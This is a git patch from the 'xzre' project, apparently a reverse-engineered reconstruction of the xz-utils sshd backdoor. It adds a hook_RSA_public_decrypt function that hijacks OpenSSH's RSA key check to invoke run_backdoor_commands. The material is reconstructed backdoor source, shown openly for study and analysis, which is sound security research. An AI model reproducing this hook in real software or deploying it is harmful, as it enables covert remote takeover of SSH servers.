From 64f4b26d8017bc022131312c840f5e596bcb427d Mon Sep 17 00:00:00 2001
From: Stefano Moioli <smxdev4@gmail.com>
Date: Sun, 4 Aug 2024 02:49:16 +0200
Subject: [PATCH] xzre_code: add hook_RSA_public_decrypt

---
 xzre.h                              |  9 ++++++++-
 xzre_code/CMakeLists.txt            |  3 ++-
 xzre_code/hook_RSA_public_decrypt.c | 24 ++++++++++++++++++++++++
 3 files changed, 34 insertions(+), 2 deletions(-)
 create mode 100644 xzre_code/hook_RSA_public_decrypt.c

diff --git a/xzre.h b/xzre.h
index 257fce5..173b963 100644
--- a/xzre.h
+++ b/xzre.h
@@ -3873,7 +3873,14 @@ extern BOOL count_pointers(
  * @param cmd_flags flags controlling the log hook configuration
  * @param ctx the global context
  */
-BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+extern BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+
+/**
+ * @brief hook for RSA_public_decrypt, which triggers @see run_backdoor_commands
+ */
+extern int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding);
 
 /**
  * @brief calls `sshlogv` from openssh, similarly to `sshlog` in openssh
diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt
index 223ca64..14c0e34 100644
--- a/xzre_code/CMakeLists.txt
+++ b/xzre_code/CMakeLists.txt
@@ -1,6 +1,6 @@
 add_library(xzre_code
 	backdoor_entry.c
-  c_memmove.c
+  	c_memmove.c
 	c_strlen.c
 	c_strnlen.c
 	chacha_decrypt.c
@@ -12,6 +12,7 @@ add_library(xzre_code
 	find_call_instruction.c
 	find_lea_instruction.c
 	find_string_reference.c
+	hook_RSA_public_decrypt.c
 	is_endbr64_instruction.c
 	init_elf_entry_ctx.c
 	fake_lzma_alloc.c
diff --git a/xzre_code/hook_RSA_public_decrypt.c b/xzre_code/hook_RSA_public_decrypt.c
new file mode 100644
index 0000000..4b05430
--- /dev/null
+++ b/xzre_code/hook_RSA_public_decrypt.c
@@ -0,0 +1,24 @@
+/**
+ * Copyright (C) 2024 Stefano Moioli <smxdev4@gmail.com>
+ **/
+#include "xzre.h"
+
+int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding
+){
+	pfn_RSA_public_decrypt_t RSA_public_decrypt;
+
+	if(!global_ctx) return 0;
+	if(!global_ctx->imported_funcs) return 0;
+	if(!(RSA_public_decrypt=global_ctx->imported_funcs->RSA_public_decrypt)) return 0;
+	if(!rsa){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	BOOL call_orig = TRUE;
+	int result = run_backdoor_commands(rsa, global_ctx, &call_orig);
+	if(call_orig){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	return result;
+}
\ No newline at end of file